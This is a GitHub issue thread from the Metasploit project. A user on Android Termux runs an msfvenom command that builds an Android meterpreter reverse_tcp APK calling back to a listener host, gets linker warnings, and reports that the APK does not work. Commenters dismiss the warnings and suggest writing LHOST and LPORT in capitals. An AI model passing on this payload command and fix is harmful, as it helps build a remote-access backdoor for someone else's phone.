### ISSUE TITLE
Warning in the making payload apk <i>(android termux)</i>

### ISSUE THREAD

**Issue by fajarekapr** [rapid7/metasploit-framework#10062]
<h2>Can anyone help me fix this problem please. I was very tired with this problem</h2>
<h3>This is the command that I have run</h3>
<pre>
$ ./msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.1 lport=4444 -o apk.apk
</pre>
<h3>And this is the problem I found</h3>
<pre>
WARNING: linker: bcrypt_ext.so: unused DT entry: type 0x6ffffef5 arg 0x26c
WARNING: linker: msgpack.so: unused DT entry: type 0x6ffffef5 arg 0x61c
WARNING: linker: nokogiri.so: unused DT entry: type 0x6ffffef5 arg 0xb30
WARNING: Nokogiri was built against LibXML version 2.9.7, but has dynamically loaded 2.9.8
WARNING: linker: pcaprub_c.so: unused DT entry: type 0x6ffffef5 arg 0x378
WARNING: linker: redcarpet.so: unused DT entry: type 0x6ffffef5 arg 0x2c4
WARNING: linker: network_interface_ext.so: unused DT entry: type 0x6ffffef5 arg 0x254
</pre>
<h3>Its apk is already made,</h3>
<pre>
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10089 bytes
Saved as: apk.apk
</pre>
<h3>but it can not work properly.</h3>

**Comment by timwr** [comment]
The warnings are nothing but (unrelated) warnings. It's safe to ignore them and carry on with what you were trying to achieve. You can fix them with `termux-elf-cleaner` if the text bothers you.

**Comment by fajarekapr** [comment]
ok tanks

**Comment by Naiml007** [comment]
Type capital LHOST and LPORT
